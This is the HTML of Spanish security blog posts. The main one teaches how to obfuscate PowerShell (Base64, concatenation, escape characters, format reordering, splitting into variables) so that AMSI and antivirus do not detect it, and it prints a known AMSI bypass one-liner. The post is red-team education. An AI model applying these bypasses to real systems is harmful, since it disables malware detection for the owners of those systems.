href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiko4LgJE9Yj0LsVXuqPZvGMa29ny17GBeiuqquJbxU6Z3m0V_Dz8oKyOCE4537T6UsgSdcCMtF1ZOSz7f3k3JRhq7_U2ciWryTfWYzPzUCgbTgmYTIc4bpdc_LLdKbGUQoa6nIJmI0fOitnVzAyu_txWBoKcn7xrJO-bWWIgDMXAkrfX6FdyAhXeP6_yH9/s2000/Proxy%20ligolo.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="355" data-original-width="2000" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiko4LgJE9Yj0LsVXuqPZvGMa29ny17GBeiuqquJbxU6Z3m0V_Dz8oKyOCE4537T6UsgSdcCMtF1ZOSz7f3k3JRhq7_U2ciWryTfWYzPzUCgbTgmYTIc4bpdc_LLdKbGUQoa6nIJmI0fOitnVzAyu_txWBoKcn7xrJO-bWWIgDMXAkrfX6FdyAhXeP6_yH9/w640-h114/Proxy%20ligolo.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Concluyendo con esta práctica hemos realizado este ejercicio:</span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi9a2D8OzBTslapEWun45ughpsefcV8WsBDiDA2NxWqvdSyYLMiKtcJp0g94Wwrqr1Ma1DqcLzlRviKXWGaUg9EX4E8uwBFSmqOGdRL6PxnaKy8OSqyZcgcLxOIAviTpavNR_3Bqd_XIEealWjZ7DuIUOX4u6bn3R-Sfy0uc3sYCzanNwDX1kdaZWB4P5J/s1083/Diagrama%203.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="511" data-original-width="1083" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi9a2D8OzBTslapEWun45ughpsefcV8WsBDiDA2NxWqvdSyYLMiKtcJp0g94Wwrqr1Ma1DqcLzlRviKXWGaUg9EX4E8uwBFSmqOGdRL6PxnaKy8OSqyZcgcLxOIAviTpavNR_3Bqd_XIEealWjZ7DuIUOX4u6bn3R-Sfy0uc3sYCzanNwDX1kdaZWB4P5J/w640-h302/Diagrama%203.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡Hasta aquí hemos llegado! ¡Esperamos que haya sido de interés y utilidad para todos!</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡¡¡A volar, perdón, a pivotar!!!! </span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><i><a href="https://www.linkedin.com/in/alejandro-au%C3%B1%C3%B3n-le%C3%B3n-86820892/">Alejandro Auñón</a></i>, Offensive Security Senior Analyst at<a href="https://www.zerolynx.com/es/"><i> Zerolynx</i></a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-78770057892268801142023-10-23T08:30:00.015+02:002023-11-07T13:07:59.251+01:00Técnicas de ofuscación para AMSI<p style="text-align: justify;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWSsdigKnvJTtjdGw98hXWbjCUxnfd-but88KNfPRtRygi3boabaeP95C1kFCKw0jii_gLdJIQFakJVU4x60sF5MnaP44VL91-YoIME0Mhina9Tlx6jq0dDBMQY6l85CvjkOCJTU3gVrDLIdB728I9YlZGpTHobRRcGqijc6XM-idba1F-m2FhkfojzZTR/s1600/Foto-AMSI.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWSsdigKnvJTtjdGw98hXWbjCUxnfd-but88KNfPRtRygi3boabaeP95C1kFCKw0jii_gLdJIQFakJVU4x60sF5MnaP44VL91-YoIME0Mhina9Tlx6jq0dDBMQY6l85CvjkOCJTU3gVrDLIdB728I9YlZGpTHobRRcGqijc6XM-idba1F-m2FhkfojzZTR/w640-h360/Foto-AMSI.png" width="640" /></a></div><p style="text-align: justify;"><br /></p><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Muy buenas a todos. En este post vamos a hablar de como los antivirus (AV) detectan scripts maliciosos en tiempo de ejecución y las medidas para ofuscar los scripts en Powershell y que la ejecución de este no sea bloqueada por el AV.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como ya se ha visto en <a href="https://www.flu-project.com/2023/10/FuncionesAMSI.html">artículos anteriores </a>, AMSI es una API que conecta el AV con Powershell para identificar si un script puede ser o no malicioso en tiempo de ejecución y en caso de serlo, bloquearlo. Pero la pregunta que hay que hacerse es la siguiente: ¿Cómo los antivirus detectan si el script es malicioso? La respuesta a esta pregunta son las firmas de los AV.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Firmas de antivirus en Powershell </span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las clásicas firmas de virus son una secuencia continua de bytes comunes en cierta muestra de malware, es decir, si esa secuencia continua de bytes está incluida en un archivo, ese archivo es malware.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Siguiendo este concepto, las firmas de antivirus en PowerShell son patrones únicos que representan cadenas características en los scripts escritos en este lenguaje. Cuando un script es escrito en la consola de Powershell, al ejecutarlo, AMSI envía el script al antivirus y este detecta si la firma de alguna de las cadenas incluidas en el script puede ser susceptible de ser maliciosa o si toda la cadena lo es y si estos casos se cumplen, la ejecución del script es bloqueada por el antivirus.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como ejemplo a esto, si intentásemos usar <b>mimikatz</b> en Powershell, como la cadena de mimikatz es bien conocida por ser un script que podría ser malicioso en manos equivocadas, si se intenta invocar, aunque el archivo no esté en el path, antes de saltar el error de que el script no se encuentra, saltará el error de que el script contiene uno o más elementos malintencionados y que ha sido bloqueado por el antivirus.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRrhcgYCrtj6v_BSZb_Xodd0Yjz77vLu1-Z23tHVUOusbRsy8tG9559V_-zetAfII6TaYx1s18MCjC_GXsB21zVigkvIPNLs49QVJQ9DEJxZITOGmn1weaQ2iC7MVL_g60fpMSqA_SEwXyMToJQ8E84oNLa5bKOfY4uGC5E01HCDePehHgQMkoYTUF2mH7/s709/Fluproject_AMSI_1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="116" data-original-width="709" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRrhcgYCrtj6v_BSZb_Xodd0Yjz77vLu1-Z23tHVUOusbRsy8tG9559V_-zetAfII6TaYx1s18MCjC_GXsB21zVigkvIPNLs49QVJQ9DEJxZITOGmn1weaQ2iC7MVL_g60fpMSqA_SEwXyMToJQ8E84oNLa5bKOfY4uGC5E01HCDePehHgQMkoYTUF2mH7/w640-h104/Fluproject_AMSI_1.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Lo mismo ocurre si escribimos la cadena <b>amsiInitFailed</b> que es usada en algunos bypass de AMSI, el antivirus lo va a detectar y bloquear porque hay una firma en el antivirus de esta cadena en concreto:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeEwrH86M7fgk6K0iFF7_YqatOo82YGD4DDgjIS2un0auXFT3CY8Jv2NaTs6MXvMhxTS-hXLGQFUgEfFqtQfxKxqfNfophDY6OPBJtJkYeaBPZ2y0II_m7zIEvBGBG2HBkAd7gWhRUdDakiIg1TBppqGfJUzxkYndmCV7UcQGLBZkFyxWPaVF2BFAkjog9/s705/Fluproject_AMSI_2.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="116" data-original-width="705" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeEwrH86M7fgk6K0iFF7_YqatOo82YGD4DDgjIS2un0auXFT3CY8Jv2NaTs6MXvMhxTS-hXLGQFUgEfFqtQfxKxqfNfophDY6OPBJtJkYeaBPZ2y0II_m7zIEvBGBG2HBkAd7gWhRUdDakiIg1TBppqGfJUzxkYndmCV7UcQGLBZkFyxWPaVF2BFAkjog9/w640-h106/Fluproject_AMSI_2.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esto, por tanto, supone un impedimento a la hora de ejecutar scripts maliciosos en primera instancia, por eso lo que se suele hacer es ofuscar las cadenas del script de manera que estas no tengan firma en el antivirus y por tanto lo hace indetectable al AV.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Técnicas de ofuscación en Powershell</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para evadir la detección del AV, se utilizan técnicas de ofuscación para modificar el código fuente de un script de manera que sea más difícil de detectar y analizar. Este conjunto de técnicas son la siguientes:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Codificación y decodificación en Base64: </span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esta técnica consiste en codificar el contenido del script en Base64 y decodificarlo en tiempo de ejecución, es decir, se codifica en Base64 la cadena que hace de trigger para el AV y se decodifica en dentro del script. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como ya hemos visto, la cadena amsiInitFailed es detectada por el AV, pero si la pasamos a base64 la cadena pasa a ser <b>YW1zaUluaXRGYWlsZWQ= </b>y al volver a convertirla en ASCII, ya no la detecta, y se imprimirá por terminal.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJql8UvksBd-2Q3trpQoO1w6TBprMohTSDMqmOZloJjg6bskpBrWIJmzot6Ib2Fdm9r02BqKlWWxPOiHIqwgTqHrfXrv6wgcz7LamOV41yNzTDip-cGwL3jGPZs2AxY2wna0-KjJ3nY5r_JojrmGnY5FlGdRZB_W_rXxNvHbBMMa_olJ1SRcdFC3U9HFbF/s709/Fluproject_AMSI_3.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="101" data-original-width="709" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJql8UvksBd-2Q3trpQoO1w6TBprMohTSDMqmOZloJjg6bskpBrWIJmzot6Ib2Fdm9r02BqKlWWxPOiHIqwgTqHrfXrv6wgcz7LamOV41yNzTDip-cGwL3jGPZs2AxY2wna0-KjJ3nY5r_JojrmGnY5FlGdRZB_W_rXxNvHbBMMa_olJ1SRcdFC3U9HFbF/w640-h92/Fluproject_AMSI_3.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Concatenación y escape de caracteres</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El operador para concatenar en Powershell, como en otros muchos lenguajes, es el carácter +. Una manera de ofuscar el código de un script es dividiendo las cadenas que lo incluyen y que tienen una firma en el AV, de manera que a la hora de escribir el script y concatenarlas en tiempo de ejecución, el antivirus no detecta la ejecución que sí detectaría sin esta concatenación porque la firma de la cadena dividida no está incluida en el mismo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz2DYy-j_sf4gOL4X1WlYkjxh1mXJXVyGexmoZ1jpchMHXLHGpSLQajHIH8yKvnwt1Rw9e1luM9SlDMwsVlfiQoDeLvrVXudO_DwKXkPP9udOjwtdlJNxfP4xe_ibBo-uhBI3mDnaGYxD3aAcWcWyLFr2fhokzQYan3OoHdGNSAc5PGl6TfOMePiTDrtE_/s709/Fluproject_AMSI_4.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="147" data-original-width="709" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz2DYy-j_sf4gOL4X1WlYkjxh1mXJXVyGexmoZ1jpchMHXLHGpSLQajHIH8yKvnwt1Rw9e1luM9SlDMwsVlfiQoDeLvrVXudO_DwKXkPP9udOjwtdlJNxfP4xe_ibBo-uhBI3mDnaGYxD3aAcWcWyLFr2fhokzQYan3OoHdGNSAc5PGl6TfOMePiTDrtE_/w640-h132/Fluproject_AMSI_4.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Otra manera de ofuscar es incluyendo en las cadenas el carácter de escape que en Powershell es el carácter `. Este tipo de carácter se suele incluir dentro de una cadena de caracteres.</span></div></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEc_IC9EV59obdZgl_EDzUyp1hegBRMLWC6L7GCQNkLp1o_kaE1Vy34L2ksQTxHXgq0KmwXZXDtBqJT1101g9bLXMVCpSPEEd27sl_-sTh3WVRDLZFi_NGAX34SLy-_dqfhh2sOfZovydpiLQVcyMiikTtTYc17ZwmCdMK3YC64HeOlah4VbNnmZK6SYM7/s684/Fluproject_AMSI_5.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="146" data-original-width="684" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEc_IC9EV59obdZgl_EDzUyp1hegBRMLWC6L7GCQNkLp1o_kaE1Vy34L2ksQTxHXgq0KmwXZXDtBqJT1101g9bLXMVCpSPEEd27sl_-sTh3WVRDLZFi_NGAX34SLy-_dqfhh2sOfZovydpiLQVcyMiikTtTYc17ZwmCdMK3YC64HeOlah4VbNnmZK6SYM7/w640-h136/Fluproject_AMSI_5.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Reordenación de cadenas con formateo</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Powershell también incluye el formateo de cadenas mediante el comando<b> -f.</b> Con esto podemos escribir una cadena que normalmente detectaría el AV por tener una firma y reordenarla en tiempo de ejecución.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqhPCR4S1ahoHq0NB_JdSEKJcQ5Jt5EHIRP7nqBLITFVEouNgwOtjN2mF5Xhz3FD2nKyE7P8EY5W9gDS1llinUpWaIIvHqXWl0DXcu3s_qwkzSfAL2fmeLj7rBAJK_-qM87fZ8FORMB-iQ1mNecdWlMaEMRmaMbt0pOzJq2NXyNHtKRCscbaIl_7CI_c8G/s709/Fluproject_AMSI_6.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="151" data-original-width="709" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqhPCR4S1ahoHq0NB_JdSEKJcQ5Jt5EHIRP7nqBLITFVEouNgwOtjN2mF5Xhz3FD2nKyE7P8EY5W9gDS1llinUpWaIIvHqXWl0DXcu3s_qwkzSfAL2fmeLj7rBAJK_-qM87fZ8FORMB-iQ1mNecdWlMaEMRmaMbt0pOzJq2NXyNHtKRCscbaIl_7CI_c8G/w640-h136/Fluproject_AMSI_6.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Reflejo de métodos .NET</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En internet existen numerosos scripts que hacen bypass a AMSI. Uno de los más famosos es el de Matt Graeber que usa el método de reflejo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El reflejo de métodos .NET (<i>reflection </i>en inglés), consiste en inspeccionar, invocar y acceder a datos de tipos .NET que incluyen tanto parámetros públicos como privados. Por defecto, PowerShell proporciona acceso a las propiedades y métodos de acceso público, pero utilizando las API de reflexión, puede acceder a los parámetros privados.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El método es el siguiente:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</span></b></div><div style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;"><br /></span></b></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Sin embargo, ya es tan usado que hay que aplicar alguna de las técnicas descritas arriba y la siguiente técnica que se va a explicar para que el antivirus no lo detecte.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">División de scripts en distintas líneas</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Existen muchos scripts de una sola línea (<i>one-liner </i>en inglés) que usan métodos como <i>reflection</i> junto con concatenación de cadenas, etc. Aunque, el uso de estos scripts está tan extendido que ya hay firmas para este tipo de scripts. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">No obstante, una manera simple de evitar que AMSI se queje, es dividiendo el código en distintas líneas o si es un código de una misma línea como el de Matt Graeber, dividiéndolo en distintas variables. De esta manera, aunque a primera vista pueda parecer absurdo, como ya hemos explicado cómo funcionan las firmas de los antivirus en Powershell y AMSI, tiene sentido que sea posible esta manera de ofuscar el script.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Veámoslo en un ejemplo.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHzLc9icyCyAyLG7seOLJmysHHCIvzRz464YJzxZYN3yjQuqLACumFsJxHfSU_v2urPfX__sj4r7MW9kf0BDkYHZoT_W6BKhaiMN-T6QOEosCk3BgJH7TyYElFCc9oEp-aE9ss6gx9USkxxqmLHwCAHaMK5oOENba_T5qXBCYqVpZshmnZ2xxj8lgghGmp/s709/Fluproject_AMSI_7.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="203" data-original-width="709" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHzLc9icyCyAyLG7seOLJmysHHCIvzRz464YJzxZYN3yjQuqLACumFsJxHfSU_v2urPfX__sj4r7MW9kf0BDkYHZoT_W6BKhaiMN-T6QOEosCk3BgJH7TyYElFCc9oEp-aE9ss6gx9USkxxqmLHwCAHaMK5oOENba_T5qXBCYqVpZshmnZ2xxj8lgghGmp/w640-h184/Fluproject_AMSI_7.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En la imagen podemos ver que el primero es el script original y al segundo se le ha aplicado concatenación de cadenas de caracteres para intentar evitar al AV. Sin embargo, es tan usado que algo así no es válido.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pero si dividimos este script en distintas líneas, el tema cambia como os voy a demostrar en la siguiente imagen:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijG3U7irEbyDp86DLx7hWA2xQN7NeDrYKNQbSqqoEBlox2m1dWYzIy_b779jCl4biiyVxvC6zhI9yqRlX9NiZyPA8O0Unzyf87OmvytSxR3LrJ-2Qa-l2Qsos2t1-H8Ud6Mi-G0wwQ9ueviuzNVB-2hyphenhyphencRw2QvqdreDSLSxdWf1deWgfu0Vgk0LIjYclR1/s718/Fluproject_AMSI_8.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="171" data-original-width="718" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijG3U7irEbyDp86DLx7hWA2xQN7NeDrYKNQbSqqoEBlox2m1dWYzIy_b779jCl4biiyVxvC6zhI9yqRlX9NiZyPA8O0Unzyf87OmvytSxR3LrJ-2Qa-l2Qsos2t1-H8Ud6Mi-G0wwQ9ueviuzNVB-2hyphenhyphencRw2QvqdreDSLSxdWf1deWgfu0Vgk0LIjYclR1/w640-h152/Fluproject_AMSI_8.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Como se puede ver, al dividirlo en distintas variables más el uso de la concatenación de cadenas de caracteres es posible evitar que AMSI detecte este script y se efectúa correctamente el bypass.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hay que aclarar que normalmente estas técnicas se usan a la vez en un mismo script ya que todas las explicadas en este post son más eficaces si se realizan en conjunto que por separado.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esto es todo por ahora. En los siguientes artículos de AMSI se verán distintas técnicas de cómo realizar estas evasiones (cuyos scripts evidentemente estarán ofuscados con alguna de las técnicas aquí mencionadas).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡Hasta el próximo post!</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span face=""open sans", sans-serif" style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;"> </span><a href="https://www.linkedin.com/in/klego/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Justo Martín</a><span face=""open sans", sans-serif" style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;">, </span><i style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;">Security Analyst at <a href="https://www.zerolynx.com/es/" style="box-sizing: border-box; color: #1e71b8; cursor: pointer; outline: none; text-decoration-line: none; transition: all 0.5s ease 0s;">Zerolynx</a></i><span face=""open sans", sans-serif" style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;">.</span></span></div></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote><div style="text-align: justify;"><br /></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-40949033654576999832023-10-16T08:30:00.012+02:002023-11-07T13:09:26.290+01:00Sistema experto portátil para la Adquisición Segura y Semiautomática de Evidencias Digitales<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimYfQivE6ahalyfEKJ6wGxEgF-h2b01m6FxZdcaVGlllQ-xXXKnpNVndfN90awr5yYiIuaO40TcKuSbd-aqQiv5jaTPWWYVoSzss7nHmGV4Hno5FndQqNWBLJBwi81NxIByS5im73o6RSxcfVJup5MZ9riyINZURDHC6JAnliQ8t2NaMRtbFow_ErCxq9o/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(6).jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="representación de ciberdelincuencia" border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimYfQivE6ahalyfEKJ6wGxEgF-h2b01m6FxZdcaVGlllQ-xXXKnpNVndfN90awr5yYiIuaO40TcKuSbd-aqQiv5jaTPWWYVoSzss7nHmGV4Hno5FndQqNWBLJBwi81NxIByS5im73o6RSxcfVJup5MZ9riyINZURDHC6JAnliQ8t2NaMRtbFow_ErCxq9o/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(6).jpg" width="640" /></a><br /><br /><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hoy os presentamos un análisis, quizá demasiado ligero, de un problema actual para el que proponemos una solución seguramente no tan ligera.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><b><span style="font-family: Barlow Semi Condensed;"> ¿Dónde estamos?</span></b></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Según el <a href="https://estadisticasdecriminalidad.ses.mir.es/publico/portalestadistico/portal/datos.html?type=pcaxis&path=/Datos5/&file=pcaxis">Portal Estadístico de Criminalidad del Ministerio del Interior de España</a>, el número de hechos conocidos relacionados con ciberdelitos no ha dejado de aumentar desde 2011. El grupo penal que más crece, y que más incidencia tiene, es el de fraude informático, que el Código Penal español define como el delito de estafa a través de la manipulación ilícita de datos y/o programas con ánimo de lucro.</span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ3lp_1FmZzQS1qhPBwEWCGo7U9suv-mo0Q9BaUJ5THs58eM5h44_NsctJnHyq-EwU9gZMlzbOWyNfoUTOImNL432PLqK8J9ACwRvXnul8JgkumkmrA0-iwZwBz8Glf_en4oZuiijAmWi_PsQDpHiDzJMA0F_VcFbYc3_u0bJoc6a1fWscDlSGuN2xZwH4/s2299/Picture1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Gráfico representativo del incremento año sobre año de delitos cibernéticos" border="0" data-original-height="1191" data-original-width="2299" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ3lp_1FmZzQS1qhPBwEWCGo7U9suv-mo0Q9BaUJ5THs58eM5h44_NsctJnHyq-EwU9gZMlzbOWyNfoUTOImNL432PLqK8J9ACwRvXnul8JgkumkmrA0-iwZwBz8Glf_en4oZuiijAmWi_PsQDpHiDzJMA0F_VcFbYc3_u0bJoc6a1fWscDlSGuN2xZwH4/w640-h332/Picture1.png" title="incremento de ciberdelitos en España" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: 